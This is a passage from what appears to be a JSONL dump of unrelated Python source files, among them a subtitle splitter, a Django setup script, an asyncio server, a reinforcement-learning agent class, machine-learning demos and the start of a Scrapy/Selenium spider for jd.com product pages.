1\r\n for i in range(len(res)):\r\n temp = res[i].split(' ')\r\n 
t = temp[0][1:len(temp[0]) - 1].split(',')\r\n begin = transToTime(t[0])\r\n end = transToTime(t[1])\r\n text = temp[1]\r\n\r\n cnt = len(text)\r\n texts = text.split(',')\r\n cur_text = texts[0]\r\n btime = formattime2time(begin)\r\n etime = formattime2time(end)\r\n diff = etime - btime\r\n sig_step = int(diff / cnt)\r\n cur_time = int(len(cur_text) * diff / cnt) + sig_step\r\n for j in range(1, len(texts)):\r\n if len(cur_text) + len(texts[j]) <= 24:\r\n cur_text += \",\" + texts[j]\r\n cur_time += int(len(texts[j]) * diff / cnt) + sig_step\r\n else:\r\n if len(cur_text.split(',')) == 1 and len(cur_text) > 24:\r\n num = len(cur_text)\r\n words = list(jieba.cut(cur_text, use_paddle=True))\r\n cur_text = words[0]\r\n word_time = int(len(cur_text) * cur_time / num)\r\n for k in range(1, len(words)):\r\n if len(cur_text) + len(words[k]) <= 24:\r\n cur_text += words[k]\r\n word_time += int(len(words[k]) * cur_time / num)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + word_time) + '\\n')\r\n btime += word_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = words[k]\r\n word_time = int(len(words[k]) * cur_time / num)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + cur_time) + '\\n')\r\n btime += cur_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = texts[j]\r\n cur_time = int(len(texts[j]) * diff / cnt) + sig_step\r\n if len(cur_text.split(','))== 1 and len(cur_text) > 24:\r\n cnt = len(cur_text)\r\n words = list(jieba.cut(cur_text, use_paddle=True))\r\n cur_text = words[0]\r\n diff = etime - btime\r\n cur_time = int(len(cur_text) * diff / cnt)\r\n for j in range(1, len(words)):\r\n if len(cur_text) + len(words[j]) <= 24:\r\n cur_text += words[j]\r\n cur_time += int(len(words[j]) * diff / cnt)\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + time2formattime(btime + cur_time) + '\\n')\r\n btime += cur_time\r\n newFile.write(cur_text + '\\n\\n')\r\n cur_text = words[j]\r\n cur_time = int(len(words[j]) * diff / cnt)\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + end + '\\n')\r\n newFile.write(cur_text)\r\n newFile.write('\\n\\n')\r\n else:\r\n newFile.write(str(step) + '\\n')\r\n step += 1\r\n newFile.write(time2formattime(btime) + ' --> ' + end + '\\n')\r\n newFile.write(cur_text)\r\n newFile.write('\\n\\n')\r\n newFile.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n audioPath = argv[1] # 音频路径\r\n zhFilePath = argv[2] # 中文字幕\r\n getZhSubtitle(audioPath, zhFilePath)\r\n","sub_path":"src/main/resources/python/audio2zhSubtitle_words.py","file_name":"audio2zhSubtitle_words.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"35575409","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2008 Joost Cassee\n# Licensed under the terms of the MIT License (see LICENSE.txt)\n\nfrom setuptools import setup\nimport metadata\n\napp_name = metadata.name\nversion = metadata.version\n\nlong_description = open('docs/index.rst').read().split('split here', 1)[0] \n\nsetup(\n name = \"django-%s\" % app_name,\n version = version,\n\n packages = [app_name],\n\n author = \"Philip Roche\",\n author_email = \"phil.roche@ticket-text.com\",\n maintainer = \"Philip Roche\",\n maintainer_email = 
\"phil.roche@ticket-text.com\",\n description = \"This Django application you to prepend a string to your django app urls useful if you need to change themes based on url.\",\n long_description = long_description,\n license = \"MIT License\",\n keywords = \"django url\",\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Application Frameworks',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware',\n ],\n)\n","sub_path":"pypi_install_script/django-urlprepend-0.4.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"418876054","text":"import os\nos.environ['PYTHONASYNCIODEBUG'] = '1'\n\nimport asyncio\n\n\nasync def server_handler(reader, writer):\n request = await reader.readline()\n request = request.decode()\n print(request)\n await asyncio.sleep(1)\n\n response = request[:-1] + ' - is done!\\n'\n print(response)\n writer.write(response.encode())\n await writer.drain()\n writer.close()\n\n\nloop = asyncio.get_event_loop()\nserver = asyncio.start_server(server_handler, '127.0.0.1', 8123, loop=loop)\nloop.run_until_complete(server)\n\nprint('Start server on localhost:8123')\ntry:\n loop.run_forever()\nexcept KeyboardInterrupt:\n pass\n\nserver.close()\nloop.run_until_complete(server.waite_closed())\nloop.close()\n","sub_path":"asyncio/my_server.py","file_name":"my_server.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1972101","text":"from __future__ import print_function, division\nimport numpy as np\nimport tensorflow as tf\nfrom configs import ReplayMemoryConfig\nfrom replay_memory import ReplayMemory\n\n\nclass BaseQAgent(object):\n \n def __init__(self, args):\n\n # problem parameters\n self.action_num = args.action_num # assume actions are 0 ... 
n-1\n self.network = args.network # might be several networks, written in one instance\n self.obs_dim = args.obs_dim # dimensionality of a single observation\n #self.max_reward = args.max_reward # currently not used\n #self.min_reward = args.min_reward\n self.ep = args.ep # epsilon greedy\n self.ep_start = self.ep\n self.ep_end = args.ep_end or self.ep\n self.ep_t = args.ep_t\n #print(self.ep_start, self.ep_end, self.ep_t)\n self.batch_size = args.batch_size\n \n # q learning parameters:\n self.discount = args.discount\n self.update_freq = args.update_freq\n self.learn_start = args.learn_start # when learning starts\n self.replay_memory = args.replay_memory # replay memory size\n self.hist_len = args.hist_len # how many observations to form a state\n self.alg_args = args.alg_args # args for specific type of agents\n \n # create replay memory for learning\n mem_args = ReplayMemoryConfig()\n mem_args.memory_size = self.replay_memory\n mem_args.obs_dim = self.obs_dim\n mem_args.hist_len = self.hist_len\n self.mem = ReplayMemory(mem_args)\n\n # replay memory for cross validation\n mem_args1 = ReplayMemoryConfig()\n mem_args1.memory_size = int(1e4)\n mem_args1.obs_dim = self.obs_dim\n mem_args1.hist_len = self.hist_len\n self.mem_cv = ReplayMemory(mem_args1)\n\n # create a seperate memory for testing\n mem_args2 = ReplayMemoryConfig()\n mem_args2.memory_size = self.hist_len * 2\n mem_args2.obs_dim = self.obs_dim\n mem_args2.hist_len = self.hist_len\n self.mem_test = ReplayMemory(mem_args2)\n # variables for learning:\n self.step_num = 0\n self.last_state = None\n self.last_state_test = None\n self.last_state_cv = None\n self.session = None\n #self.last_action = None\n\n self.mode = 'learn'\n self.mode_dict = ['learn', 'cv', 'test']\n\n def load_tf_session(self, sess):\n self.session = sess\n\n def set_mode(self, mode):\n assert (mode in self.mode_dict)\n self.mode = mode\n\n\n def actions_to_one_hot(self, a):\n # take nx1 actions and turn it into nxa vectors \n n = a.shape[0]\n one_hot = np.zeros((n, self.action_num))\n one_hot[np.arange(n), a] = 1\n return one_hot\n\n\n def get_next_action(self):\n if self.mode == 'learn':\n return self.get_next_action_e_greedy(self.last_state)\n if self.mode == 'test':\n return self.get_next_action_greedy(self.last_state_test)\n if self.mode == 'cv':\n return self.get_next_action_e_greedy(self.last_state_cv)\n \n def get_next_action_greedy(self, s):\n q = self.get_value_output(s)\n a = np.argmax(q)\n return a\n\n def get_next_action_e_greedy(self, s):\n # epsilon greedy\n self.ep = self.ep_start - (self.ep_start - self.ep_end) / self.ep_t * min(self.step_num, self.ep_t)\n tmp = np.random.uniform(0, 1)\n if tmp < self.ep:\n a = np.random.randint(self.action_num)\n #print(tmp, self.ep, a)\n else:\n a = self.get_next_action_greedy(s)\n return a\n\n def learn(self):\n pass\n\n def get_q_targets(self, r, s2, term):\n pass\n \n def get_value_output(self, s):\n # get q values/advantage values for each action given state s\n pass\n\n def observe_step(self, o, a, r, term):\n o = o.flatten()# ignore whatever the original form is?\n if self.mode == 'learn':\n self.mem.add(o, a, r, term)\n self.step_num += 1\n if self.step_num >= self.learn_start and\\\n (self.step_num % self.update_freq) == 0:\n self.learn()\n self.last_state = self.mem.get_recent_state()\n if self.mode == 'test':\n self.mem_test.add(o, a, r, term)\n self.last_state_test = self.mem_test.get_recent_state()\n if self.mode == 'cv':\n self.mem_cv.add(o, a, r, term)\n self.last_state_cv = 
self.mem_cv.get_recent_state()\n\n def observe_first(self, o):\n o = o.flatten()\n # get the first observation in an episode\n if self.mode == 'learn':\n for i in range(self.hist_len):\n self.mem.add(o, 0, 0.0, False)\n self.last_state = self.mem.get_recent_state()\n if self.mode == 'test':\n for i in range(self.hist_len): # copy the same observation for the first state\n self.mem_test.add(o, 0, 0.0, False)\n self.last_state_test = self.mem_test.get_recent_state()\n if self.mode == 'cv':\n for i in range(self.hist_len):\n self.mem_cv.add(o, 0, 0.0, False)\n self.last_state_cv = self.mem_cv.get_recent_state()\n\n def get_cv_info(self, batch_size):\n s, s2, a, r, term = self.mem_cv.sample_batch(batch_size)\n q = self.network.get_q_output(self.session, s)\n targets = self.get_q_targets(r, s2, term)\n a = self.actions_to_one_hot(a)\n info = {}\n info['avg_q'] = np.mean(q, axis=0)\n info['max_q'] = np.amax(q)\n info['min_q'] = np.amin(q)\n info['min_t'] = np.amin(targets)\n info['max_t'] = np.amax(targets)\n info['min_r'] = np.amin(r)\n info['max_r'] = np.amax(r)\n info['term_num'] = np.sum(term)\n info['avg_a'] = np.mean(self.actions_to_one_hot(np.argmax(q, axis=1)), axis=0)\n info['cv_loss'] = self.network.get_loss(self.session, s, a, targets)\n return info\n\n def get_info(self, batch_size):\n info = self.get_cv_info(batch_size)\n info['step'] = self.step_num\n info['epsilon'] = self.ep\n info['weight_norm'] = self.network.get_weight_norm(self.session)\n return info\n\n def save_model(self, file_name):\n self.network.save_model(self.session, file_name)\n\n def load_model(self, file_name):\n self.network.load_model(self.session, file_name)\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"base_agent.py","file_name":"base_agent.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305324101","text":"from matplotlib.pyplot import title\nfrom util import *\nfrom rbm import RestrictedBoltzmannMachine\nfrom dbn import DeepBeliefNet\n\nif __name__ == \"__main__\":\n\n image_size = [28, 28]\n train_imgs, train_lbls, test_imgs, test_lbls = read_mnist(\n dim=image_size, n_train=60000, n_test=10000)\n\n # ''' restricted boltzmann machine '''\n\n # print(\"\\nStarting a Restricted Boltzmann Machine..\")\n\n # rbm = RestrictedBoltzmannMachine(ndim_visible=image_size[0]*image_size[1],\n # ndim_hidden=500,\n # is_bottom=True,\n # image_size=image_size,\n # is_top=False,\n # n_labels=10,\n # batch_size=20\n # )\n\n # rbm.cd1(visible_trainset=train_imgs, n_iterations=18000)\n\n ''' deep- belief net '''\n\n print(\"\\nStarting a Deep Belief Net..\")\n\n dbn = DeepBeliefNet(sizes={\"vis\": image_size[0]*image_size[1], \"hid\": 500, \"pen\": 500, \"top\": 2000, \"lbl\": 10},\n image_size=image_size,\n n_labels=10,\n batch_size=20\n )\n\n ''' greedy layer-wise training '''\n\n dbn.train_greedylayerwise(vis_trainset=train_imgs,\n lbl_trainset=train_lbls, n_iterations=90000)\n\n # dbn.recognize(train_imgs[:1000, :], train_lbls[:1000, :])\n\n # dbn.recognize(test_imgs, test_lbls)\n \n\n imgs = []\n for digit in range(10):\n digit_1hot = np.zeros(shape=(1, 10))\n digit_1hot[0, digit] = 1\n imgs.append(dbn.generate(digit_1hot, name=\"rbms\", init_random_pen=True))\n plot_generated(np.array(imgs), np.array([i for i in range(10)]))\n\n imgs = []\n for digit in range(10):\n digit_1hot = np.zeros(shape=(1, 10))\n digit_1hot[0, digit] = 1\n imgs.append(dbn.generate(digit_1hot, name=\"rbms\", init_random_pen=False))\n 
plot_generated(np.array(imgs), np.array([i for i in range(10)]), dirname='rand_img')\n\n # ''' fine-tune wake-sleep training '''\n\n # dbn.train_wakesleep_finetune(\n # vis_trainset=train_imgs, lbl_trainset=train_lbls, n_iterations=10000)\n\n # dbn.recognize(train_imgs, train_lbls)\n\n # dbn.recognize(test_imgs, test_lbls)\n\n # for digit in range(10):\n # digit_1hot = np.zeros(shape=(1, 10))\n # digit_1hot[0, digit] = 1\n # dbn.generate(digit_1hot, name=\"dbn\")\n","sub_path":"lab4/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"429032550","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport glob\nimport seaborn as sns\nimport matplotlib\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef transform_model(row):\n if row['method'] == 'DM':\n return row['ml']\n elif row['method'] == 'IPW':\n return row['prop_pred']\n else:\n return f'{row[\"prop_pred\"]}, {row[\"ml\"]}'\n\ndf = pd.DataFrame()\n \n# our method\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/our_method.csv')\ndf_buffer['method'] = df_buffer['method'].map({'Direct': 'DM', 'Robust': 'DR', 'IPW': 'IPW'})\ndf_buffer = df_buffer[((df_buffer['budget'].isna()) | (df_buffer['budget'] == 1.0)) & (df_buffer['depth'] == 1)]\n# print(df_buffer['ml'].value_counts())\n# dm = df_buffer[(df_buffer['method'] == 'DM') & (df_buffer['ml'] == 'linear')]\n# dr = df_buffer[(df_buffer['method'] == 'DR') & ((df_buffer['ml'] == 'linear') & (df_buffer['prop_pred'] == 'tree'))]\n# ipw = df_buffer[(df_buffer['method'] == 'IPW') & (df_buffer['prop_pred'] == 'tree')]\n\ndf_buffer['prop_pred'] = df_buffer['prop_pred'].map({'tree': 'DT', 'log': 'Log'})\ndf_buffer['ml'] = df_buffer['ml'].map({'linear': 'LR', 'lasso': 'Lasso'})\n\ndef transform_model(row):\n if row['method'] == 'DM':\n return row['ml']\n elif row['method'] == 'IPW':\n return row['prop_pred']\n else:\n return f'{row[\"prop_pred\"]}, {row[\"ml\"]}'\n \ndf_buffer['model'] = df_buffer.apply(lambda row: transform_model(row), axis=1)\n\n# df_buffer = pd.concat([ipw, dm, dr], ignore_index=True)\n\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=True)\n\n\n# K-PT/B-PT\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/KB.csv')\ndf_buffer['method'] = df_buffer['method'].map({'Kallus': 'K-PT', 'Bertsimas': 'B-PT'})\ndf_buffer = df_buffer[df_buffer['depth'] == 1]\ndf_buffer['model'] = '-'\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=True)\n\n# policytree\ndf_buffer = pd.read_csv(f'../results/synthetic/compiled/policytree/raw.csv')\nfor col, oosp, regret in zip([f'time_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'p{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'oosr_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']]):\n h = pd.DataFrame({'solve_time': df_buffer[col].tolist(),\n 'regret_test': df_buffer[regret].tolist(),\n 'best_found_test': df_buffer[oosp].tolist()})\n h['method'] = 'PT'\n h['best_found_test'] *= 100\n h['gap'] = 0\n h['depth'] = 1\n h['model'] = 'DT, LR'\n df = pd.concat([df, h], ignore_index=False)\n \n \n# CF, CT\nfor m, m_name in zip(['cf', 'ct'], ['CF', 'CT']):\n df_buffer = pd.read_csv(f'../results/synthetic/compiled/CF/{m}_raw.csv')\n# df_trans = pd.DataFrame(columns=['method', 
'randomization', 'realized_outcome_oos'])\n for col, oosp, regret in zip([f'time_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'p{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']],\n [f'oosr_{i}' for i in ['0.1', '0.25', '0.5', '0.75', '0.9']]):\n h = pd.DataFrame({'solve_time': df_buffer[col].tolist(),\n 'regret_test': df_buffer[regret].tolist(),\n 'best_found_test': df_buffer[oosp].tolist()})\n h['method'] = m_name\n h['gap'] = 0\n h['best_found_test'] *= 100\n h['depth'] = '-'\n h['model'] = '-'\n df = pd.concat([df, h], ignore_index=False)\n \n \n# RC\nfp = '../results/synthetic/compiled/RC'\ndf_buffer = pd.read_csv(os.path.join(fp, 'raw.csv'))\ndf_buffer = df_buffer[df_buffer['method'] == 'lr']\ndf_buffer['method'] = 'R&C'\ndf_buffer = df_buffer.rename(columns={'time_elapsed': 'solve_time', 'oosp': 'best_found_test',\n 'oos_regret': 'regret_test'})\ndf_buffer['gap'] = 0\ndf_buffer['depth'] = '-'\ndf_buffer['model'] = 'LR'\ndf_buffer['best_found_test'] *= 100\ndf = pd.concat([df, df_buffer[['depth', 'method', 'model', 'gap', \n 'solve_time', 'regret_test', 'best_found_test']]], ignore_index=False)\n\n\nmean_df = df.groupby(['depth', 'method', 'model']).agg('mean').reset_index().round(2)\nstd_df = df.groupby(['depth', 'method', 'model']).agg('std').reset_index().round(2)\n\ncombined = mean_df.merge(std_df, on=['depth', 'method', 'model'])\nfor col in ['gap', 'solve_time', 'regret_test', 'best_found_test']:\n combined[col] = combined.apply(lambda row: f'{row[f\"{col}_x\"]:.2f} ± {row[f\"{col}_y\"]:.2f}', axis=1)\n combined = combined.drop(columns=[f'{col}_{i}' for i in ['x', 'y']])\n\nmapping = {'IPW': 1, 'DM': 2, 'DR': 3, 'K-PT': 4, 'B-PT': 5, 'PT': 6, 'CF': 0, 'R&C': 0, 'CT': 0}\n\ncombined['method_map'] = combined['method'].apply(lambda x: mapping[x])\n\nprint(combined.sort_values(by=['depth', 'method_map']).drop(columns=['method_map']).to_latex(index=False))","sub_path":"analysis_viz/appendix_table2.py","file_name":"appendix_table2.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"153058559","text":"import logging\nimport os\n\nfrom neuron import h\nfrom netpyne import specs, conversion\n\n\ndef init_cells(net_params: specs.NetParams, cells):\n all_cells = load_many_cells(cells, net_params)\n return all_cells\n\n\ndef load_hoc_files(load_biophysics=True):\n \"\"\"\n Check the h.load_file documentation. The flag value 1 is required to force NEURON to load a file with the same\n name again.\n https://www.neuron.yale.edu/neuron/static/py_doc/programming/dynamiccode.html?highlight=load_file#load_file\n \"\"\"\n\n # Load import3d, this is required for the cell morphologies\n h.load_file(\"import3d.hoc\")\n # Load constants, not sure if this is needed, but better safe than sorry\n h.load_file(\"constants.hoc\")\n\n # Load morphology. Every cell has its own morphology\n h.load_file(1, \"morphology.hoc\")\n # Load biophysics. Every cell type has its own biophysics\n # if clause to prevent error output of trying to load same template multiple times\n if load_biophysics:\n h.load_file(1, \"biophysics.hoc\")\n # Load synapses. 
Needed for synmechs\n h.load_file(1, \"synapses/synapses.hoc\")\n\n\ndef load_cell(label: str, cell_name: str, net_params: specs.NetParams, load_path=None, load_biophysic=True) -> dict:\n\n # Set current workdir temporarily to this cells directory so hoc files load properly\n # (For some reason full paths break loading of cells sometimes)\n original_path = os.getcwd()\n if load_path is None:\n os.chdir(os.path.join(original_path, \"cells\", label))\n template_path = str(os.path.join(original_path, \"cells\", label, \"template.hoc\"))\n else:\n os.chdir(os.path.join(load_path, label))\n template_path = str(os.path.join(load_path, label, \"template.hoc\"))\n\n net_params.popParams.keys()\n\n # Import cell files\n load_hoc_files(load_biophysic)\n\n # This function imports the cells. Does not work if cells have\n cell_rule = net_params.importCellParams(\n label=label,\n fileName=template_path,\n cellName=cell_name,\n cellArgs=[1], # Load synapses: 0 = false, 1=true. Need to be true to import synapse mechanisms\n importSynMechs=True,\n )\n # Set workdir back to original\n os.chdir(original_path)\n return cell_rule\n\n\ndef load_many_cells(cells, net_params: specs.NetParams) -> list[dict]:\n all_cells = []\n for i, cell in enumerate(cells):\n logging.info(\"Loading cell num {}\".format(i))\n cell_type_labels = list(map(lambda x: x[:-2], net_params.cellParams.keys()))\n\n load_biophysics = cell[\"label\"][:-2] not in cell_type_labels\n\n c = load_cell(label=cell[\"label\"], cell_name=cell[\"cell_name\"],\n net_params=net_params,\n load_biophysic=load_biophysics)\n all_cells.append(c)\n logging.debug(net_params.cellParams.keys())\n return all_cells\n","sub_path":"netpyne/config/cell_config.py","file_name":"cell_config.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623009782","text":"# coding:iso-8859-9\r\n# p_13806a.py: example of subclass objects' overridden class attributes not being carried over with @staticmethod.\r\n\r\nclass Evciller:\r\n ad = \"evcil hayvanlar\"\r\n @staticmethod\r\n def hakkında(): print (\"Bu sınıf {} hakkındadır!\" .format (Evciller.ad) ) \r\n\r\nclass Köpekler (Evciller): ad = \"insanların en sadık arkadaşı olan köpekler\"\r\nclass Kediler (Evciller): ad = \"insanın ayakları dibinden ayrılmayan kediler\"\r\nclass Kuşlar (Evciller): ad = \"insanın omuzlarında şakıyan muhabbet kuşları\"\r\n\r\ne = Evciller()\r\ne.hakkında()\r\n\r\nkö = Köpekler()\r\nkö.hakkında()\r\n\r\nke = Kediler()\r\nke.hakkında()\r\n\r\nku = Kuşlar()\r\nku.hakkında()\r\n\r\n\"\"\"Output:\r\n>python p_13806a.py\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\nBu sınıf evcil hayvanlar hakkındadır!\r\n\"\"\"","sub_path":"Bernd Klein (520) ile Python/p_13806a.py","file_name":"p_13806a.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525468552","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pyloco\n\nfrom .error import FreError\nfrom .app import AppBuildAnalyzer\nfrom .control import FrelptController\n\nclass FrelptTask(pyloco.Task):\n\n _name_ = \"frelpt\"\n _version_ = \"0.1.1\"\n\n def __init__(self, parent):\n\n self.add_data_argument(\"target\", help=\"filepath to the source file having 'pushdown' frelpt directive\")\n self.add_data_argument(\"build\", help=\"Linux command to compile a target application\")\n 
self.add_data_argument(\"clean\", help=\"Linux command to clean a target application\")\n\n self.add_option_argument(\"-o\", \"--outdir\", default=os.getcwd(), help=\"output directory\")\n\n def perform(self, targs):\n\n retval = 0\n\n try:\n\n # check if target file exist\n if not os.path.isfile(targs.target):\n raise FreError(\"Failed target argument of '%s'\"%str(targs.target))\n\n parent = self.get_proxy()\n\n # run application build analyzer\n app_analyzer = AppBuildAnalyzer(parent)\n argv = [targs.build, targs.clean, \"--outdir\", targs.outdir]\n retval, _forward = app_analyzer.run(argv)\n\n # run frelpt controller\n ctrl = FrelptController(parent)\n argv = [targs.target , \"--outdir\", targs.outdir]\n retval, _ = ctrl.run(argv, forward=_forward)\n\n except FreError as err:\n raise\n\n except Exception as err:\n raise\n\n return retval\n","sub_path":"frelpt/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96570313","text":"import os\nimport argparse\nimport ujson as json\n\nfrom mnt.clde.word_translation import WordTranslator\nfrom mnt.problems.cltc.data import CLTC_DATA\nfrom mnt.problems.cltc import dictionary\n\ndef main(args):\n with open(args.D) as f:\n D = json.load(f)\n D = dictionary.clean_key_list(D)\n D = dictionary.reverse_kv(D)\n wt = WordTranslator(D)\n cd = CLTC_DATA(args.base_dir)\n for dataset in [\"book\", \"dvd\", \"music\"]:\n for pos in [\"positive\", \"negative\"]:\n src_paths, src_filenames = cd.get_filenames(\n lang=\"fr\",\n dataset=dataset,\n ds_type=\"test\",\n positive=pos\n )\n trg_paths = [\n os.path.join(args.base_dir, \"fr2en\", dataset,\n \"test\", pos,\n src_filename) for src_filename in src_filenames\n ]\n assert len(src_paths) == len(trg_paths)\n for src_fn, trg_fn in zip(src_paths, trg_paths):\n with open(src_fn) as f1, open(trg_fn, \"w\") as f2:\n src_tokens = f1.read().strip().split(\" \")\n trg_tokens = wt.translate(src_tokens)\n f2.write(\" \".join(trg_tokens))\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--base_dir\", \n default=\"/Users/chizewen/res/cross_distill/data/amazon_review/\")\n parser.add_argument(\"--D\", \n default=\"/Users/chizewen/repo/My-NLP-Tools/mnt/clde/out/80K_cut8_.fr.1\")\n args = parser.parse_args()\n main(args)","sub_path":"deprecated/mnt/problems/cltc/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"366060879","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn.datasets import make_moons\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport mglearn\n\nsplitStr = \"\\n\" + \"=\" * 100 + \"\\n\"\n\nX, y = make_moons(n_samples = 100, noise = 0.25, random_state = 3)\nX_train, X_test, y_train, y_test = train_test_split(X, y, stratify = y, random_state = 42)\n\nmlp = MLPClassifier(solver = 'lbfgs', random_state = 0, hidden_layer_sizes = [4, 5], \n\tactivation = 'tanh', alpha = 0.0001).fit(X_train, y_train)\nmglearn.plots.plot_2d_separator(mlp, X_train, fill = True, alpha = 0.3)\nmglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)\nplt.xlabel(\"Feature 0\")\nplt.ylabel(\"Feature 1\")\nplt.show()\nprint(splitStr)\nprint(\"training set score: \", mlp.score(X_train, y_train))\nprint(\"test set score: \", mlp.score(X_test, y_test))\n\nfig, axes = 
plt.subplots(2, 4, figsize = (20, 8))\nfor axx, n_hidden_nodes in zip(axes, [10, 100]):\n\tfor ax, alpha, in zip(axx, [0.0001, 0.01, 0.1, 1]):\n\t\tmlp = MLPClassifier(solver = 'lbfgs', random_state = 0, \n\t\t\thidden_layer_sizes = [n_hidden_nodes, n_hidden_nodes], \n\t\t\talpha = alpha).fit(X_train, y_train)\n\n\t\tmglearn.plots.plot_2d_separator(mlp, X_train, fill = True, alpha = 0.3, ax = ax)\n\t\tmglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax = ax)\n\t\tax.set_title(\"n_hidden = [{}, {}]\\nalpha = {:.4f}\".format(n_hidden_nodes, n_hidden_nodes, alpha))\n\t\tprint(splitStr)\n\t\tprint(\"training set score: \", mlp.score(X_train, y_train))\n\t\tprint(\"test set score: \", mlp.score(X_test, y_test))\nplt.show()\n","sub_path":"Chapter2/tuanhtran/neuralNetwork_MLPClassifier_twoMoons.py","file_name":"neuralNetwork_MLPClassifier_twoMoons.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"102104912","text":"# -*- coding: utf-8 -*-\nfrom scrapy_redis.spiders import RedisSpider\nimport scrapy\nfrom urllib import parse\nimport re\nfrom JdSpider.items import JDItemLoader, JdspiderItem\nimport datetime\nfrom selenium import webdriver\nfrom JdSpider.settings import CHROME_DRIVER_PATH\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\n\n\nclass JdSpiderSpider(RedisSpider):\n name = 'jd_spider'\n redis_key = 'jd_spider:start_urls'\n allowed_domains = ['jd.com']\n\n def __init__(self, **kwargs):\n # initialise the browser used by selenium to load pages\n chrome_opt = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_opt.add_experimental_option(\"prefs\", prefs)\n self.browser = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH, chrome_options=chrome_opt)\n # self.browser = webdriver.Chrome(executable_path=r\"E:\\Workspaces\\OldSpider\\JdSpider\\JdSpider\\driver\\chromedriver2_34.exe\", chrome_options=chrome_opt)\n super(JdSpiderSpider, self).__init__()\n dispatcher.connect(self.spider_close, signals.spider_closed)\n\n self.first = True\n self.yieldNum = 0\n self.yieldPNum = 0\n\n def spider_close(self):\n # close chrome when the spider exits\n self.browser.close()\n\n def parse(self, response):\n \"\"\"\n 1. Extract all urls from the html page and follow them for asynchronous crawling\n 2. If an extracted url has the form /item.jd.com/xxx, go straight to the parsing function\n \"\"\"\n index_obj = re.match(\"(.*www.jd.com.*)\", response.url)\n if index_obj and self.first:\n self.first = False\n all_urls = response.css(\".cate_menu a::attr(href)\").extract()\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n for url in all_urls:\n self.yieldNum += 1\n yield scrapy.Request(url)\n else:\n all_urls = response.css(\"a::attr(href)\").extract()\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n new_urls = []\n for url in all_urls:\n m = re.match(\".*javascript.*\", url)\n if not m:\n new_urls.append(url)\n for url in new_urls:\n match_obj = re.match(\"(.*item.jd.com/(\\d+).html.*)\", url)\n if match_obj:\n # if an item-related page is found, download it and hand it to parse_item for 